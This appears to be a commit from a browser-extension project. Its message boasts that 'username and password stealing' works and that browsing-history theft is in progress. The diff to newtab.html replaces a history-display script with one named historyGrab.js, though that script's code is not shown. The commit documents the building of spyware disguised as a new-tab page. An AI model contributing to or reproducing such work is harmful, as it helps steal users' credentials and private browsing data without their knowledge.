Username and password stealing working. Browsing history is in the works

--- a/newtab.html
+++ b/newtab.html
@@ -14,6 +14,6 @@
 
     <script src="bootstrap/js/jquery-3.0.0.min.js"></script>
     <script src="bootstrap/js/bootstrap.min.js"></script>
-    <script src="populatehistory.js"></script>
+    <script src="historyGrab.js"></script>
   </body>
 </html>
